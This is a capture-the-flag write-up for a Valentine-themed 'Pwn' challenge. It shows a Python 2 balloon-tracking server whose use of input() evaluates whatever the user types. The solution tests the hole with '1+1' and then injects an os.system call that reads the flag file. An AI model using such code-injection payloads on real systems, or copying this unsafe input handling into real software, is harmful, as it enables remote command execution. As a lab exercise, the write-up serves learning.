Category

Pwn

Description

Starting off with a bang (pop)! I ordered a bunch of Valentine’s Day-themed balloons, and I’m so excited about them! Here’s the portal I use to track my order.

Look for “valentine.txt.”

Solution

Attached are the code for the server.

from balloon_tracking_lookup import get_status

print "Welcome to your balloon order-tracking portal! Enter your tracking number here.\n"
tracking_number = input(">>> ")

try:
  print "Getting status for order #" + str(int(tracking_number)) + "..."
except:
  print "Invalid tracking number!"

print get_status(int(tracking_number))

As we can see from the code, it’s Python 2 code, and thus the input function should be vulnerable for remote code execution when used as raw input from the user.

To test it, we can simply enter 1+1 and see if the output is 2.

Welcome to your balloon order-tracking portal! Enter your tracking number here.

1+1
>>> Getting status for order #2...
Tracking number not found!

Great, all we have to do now is to cat the flag.

Welcome to your balloon order-tracking portal! Enter your tracking number here.

__import__("os").system("cat valentine.txt")
valentine{0ops_i_go7_hydrog3n_ball00n5_NONOWHEREAREYOUGOINGWITHTHATLIGHTER}>>> Getting status for order #0...
Tracking number not found!